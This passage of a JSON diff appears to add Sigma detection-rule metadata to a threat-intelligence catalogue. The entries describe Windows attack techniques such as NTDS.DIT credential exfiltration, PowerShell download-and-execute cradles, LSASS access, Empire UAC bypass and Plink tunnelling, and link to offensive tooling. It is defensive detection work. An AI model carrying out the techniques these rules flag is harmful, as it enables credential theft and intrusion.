"logsource.product": "windows", + "refs": [ + "https://nmap.org/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nmap.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "value": "Suspicious Nmap Execution" + }, + { + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_non_exe_image.yml", + "level": 
"high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlaboratories.com/2021/12/08/process-ghosting/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c09dad97-1c78-4f71-b127-7edb2b8e491a", + "value": "Execution of Suspicious File Type Extension" + }, + { + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ntdll_type_redirect.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.x86matthew.com/view_post?id=ntdll_pipe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "value": "Suspicious Ntdll Pipe Redirection" + }, + { + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ntds.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", + "https://github.com/zcgonvh/NTDSDumpEx", + 
"https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "value": "Suspicious Process Patterns NTDS.DIT Exfil" + }, + { + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/14", + "falsepositive": [ + "Legitimate usage to restore snapshots", + "Legitimate admin activity" + ], + "filename": "proc_creation_win_susp_ntdsutil_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5", + "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)" + }, + { + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "meta": { + "author": "Elastic (idea), Tobias Michalski", + "creation_date": "2022/05/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ntlmrelay.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://twitter.com/med0x2e/status/1520402518685200384", + "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "bb76d96b-821c-47cf-944b-7ce377864492", + "value": "Suspicious NTLM Authentication on the Printer Spooler Service" + }, + { + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "meta": { + "author": "Nasreddine Bencherchali @nas_bench", + "creation_date": "2021/12/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "value": "Suspicious NT Resource Kit Auditpol Usage" + }, + { + "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", + "meta": { + "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate use of odbcconf.exe by legitimate user" + ], + "filename": 
"proc_creation_win_susp_odbcconf.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", + "https://twitter.com/Hexacorn/status/1187143326673330176", + "https://redcanary.com/blog/raspberry-robin/", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.008" + ] + }, + "uuid": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "value": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe" + }, + { + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate command-lines containing the string mentioned in the command-line" + ], + "filename": "proc_creation_win_susp_office_token_search.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mrd0x.com/stealing-tokens-from-office-applications/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615", + "value": "Suspicious Office Token Search Via CLI" + }, + { + "description": "The OpenWith.exe executes other binary", + "meta": { + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "creation_date": "2019/10/12", + "falsepositive": [ + "Legitimate use of 
OpenWith.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_openwith.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", + "https://twitter.com/harr0ey/status/991670870384021504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", + "value": "OpenWith.exe Executes Specified Binary" + }, + { + "description": "Detects EnableUnsafeClientMailRules used for Script Execution from Outlook", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_outlook.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/sensepost/ruler", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.t1202" + ] + }, + "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723", + "value": "Suspicious Execution from Outlook" + }, + { + "description": "Detects a suspicious program execution in Outlook temp folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_outlook_temp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml" + ], 
+ "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "value": "Execution in Outlook Temp Folder" + }, + { + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_parents.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/x86matthew/status/1505476263464607744?s=12", + "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" + ], + "tags": "No established tags" + }, + "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "value": "Suspicious Process Parents" + }, + { + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_parent_of_conhost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parent_of_conhost.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "value": "Conhost Spawned By Suspicious Parent Process" + }, + { + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low 
level stuff", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/10/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_pchunter.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.xuetr.com/", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" + ], + "tags": "No established tags" + }, + "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "value": "PCHunter Usage" + }, + { + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/05", + "falsepositive": [ + "Use of Program Compatibility Troubleshooter Helper" + ], + "filename": "proc_creation_win_susp_pcwutl.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", + "https://twitter.com/harr0ey/status/989617817849876488", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", + "value": "Code Execution via Pcwutl.dll" + }, + { + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate use of Pester for writing tests for Powershell scripts and modules" + ], + "filename": "proc_creation_win_susp_pester.yml", + 
"level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", + "value": "Execute Code with Pester.bat" + }, + { + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use of Pester for writing tests for Powershell scripts and modules" + ], + "filename": "proc_creation_win_susp_pester_parent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://twitter.com/_st0pp3r_/status/1560072680887525378", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878", + "value": "Execute Code with Pester.bat as Parent" + }, + { + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. 
Its used to hide the file responsible for the initial infection for example", + "meta": { + "author": "Ilya Krestinichev", + "creation_date": "2022/11/03", + "falsepositive": [ + "False positive could occur in admin scripts that execute inline" + ], + "filename": "proc_creation_win_susp_ping_del.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "value": "Suspicious Ping And Del Combination" + }, + { + "description": "Detects a ping command that uses a hex encoded IP address", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + ], + "filename": "proc_creation_win_susp_ping_hex_ip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", + "https://twitter.com/vysecurity/status/977198418354491392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" + ] + }, + "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "value": "Ping Hex IP" + }, + { + "description": "Detects 
suspicious Plink tunnel port forwarding to a local port", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/19", + "falsepositive": [ + "Administrative activity using a remote port forwarding to a local port" + ], + "filename": "proc_creation_win_susp_plink_port_forward.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", + "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "48a61b29-389f-4032-b317-b30de6b95314", + "value": "Suspicious Plink Port Forwarding" + }, + { + "description": "Execution of plink to perform data exfiltration and tunneling", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/04", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_plink_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "value": "Suspicious Plink Usage RDP Tunneling" + }, + { + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", + "meta": { + "author": "frack113", + "creation_date": "2022/11/18", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_susp_powercfg.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "value": "Suspicious Powercfg Execution To Change Lock Screen Timeout" + }, + { + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/24", + "falsepositive": [ + "Other tools that work with encoded scripts in the command line instead of script files" + ], + "filename": "proc_creation_win_susp_powershell_cmd_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "value": "Suspicious PowerShell Encoded Command Patterns" + }, + { + "description": "Detects suspicious ways to download files or content using PowerShell", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/24", + "falsepositive": [ + "Scripts or tools that download files" + ], + "filename": "proc_creation_win_susp_powershell_download_cradles.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml" + ], + "tags": "No established tags" + }, + "uuid": "6e897651-f157-4d8f-aaeb-df8151488385", + "value": "PowerShell Web Download" + }, + { + "description": "Detects suspicious ways to download files or content and execute them using PowerShell", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/24", + "falsepositive": [ + "Scripts or tools that download files and execute them" + ], + "filename": "proc_creation_win_susp_powershell_download_iex.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775", + "value": "PowerShell Web Download and Execution" + }, + { + "description": "Detects suspicious powershell command line parameters used in Empire", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/04/20", + "falsepositive": [ + "Other tools that incidentally use the same command line parameters" + ], + "filename": "proc_creation_win_susp_powershell_empire_launch.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", + 
"https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", + "value": "Empire PowerShell Launch Parameters" + }, + { + "description": "Detects some Empire PowerShell UAC bypass methods", + "meta": { + "author": "Ecco", + "creation_date": "2019/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_empire_uac_bypass.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_uac_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ] + }, + "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787", + "value": "Empire PowerShell UAC Bypass" + }, + { + "description": "Commandline to launch powershell with a base64 payload", + "meta": { + "author": "frack113", + "creation_date": "2022/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_encode.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", + "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", + "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", + "value": "Suspicious Execution of Powershell with Base64" + }, + { + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_encoded_param.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1281103918693482496", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_param.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6", + "value": "PowerShell Encoded Character Syntax" + }, + { + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. 
Emotet)", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "creation_date": "2018/09/03", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_powershell_enc_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_enc_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "value": "Suspicious Encoded PowerShell Command Line" + }, + { + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_getprocess_lsass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/PythonResponder/status/1385064506049630211", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "value": "PowerShell Get-Process LSASS" + }, + { + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "meta": { + "author": "John Lambert (rule)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_hidden_b64_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_hidden_b64_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines" + }, + { + "description": "Detects suspicious ways to run Invoke-Execution using IEX acronym", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/24", + "falsepositive": [ + "Legitimate scripts that use IEX" + ], + "filename": "proc_creation_win_susp_powershell_iex_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml" + ], + "tags": "No established tags" + }, + "uuid": "09576804-7a05-458e-a817-eb718ca91f54", + "value": "Suspicious PowerShell IEX Execution Patterns" + }, + { + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Microsoft Operations Manager (MOM)", + "Other scripts" + ], + "filename": "proc_creation_win_susp_powershell_parent_combo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_combo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"95eadcb2-92e4-4ed1-9031-92547773a6db", + "value": "Suspicious PowerShell Invocation Based on Parent Process" + }, + { + "description": "Detects a suspicious parents of powershell.exe", + "meta": { + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "creation_date": "2020/03/20", + "falsepositive": [ + "Other scripts" + ], + "filename": "proc_creation_win_susp_powershell_parent_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", + "value": "Suspicious PowerShell Parent Process" + }, + { + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/29", + "falsepositive": [ + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM 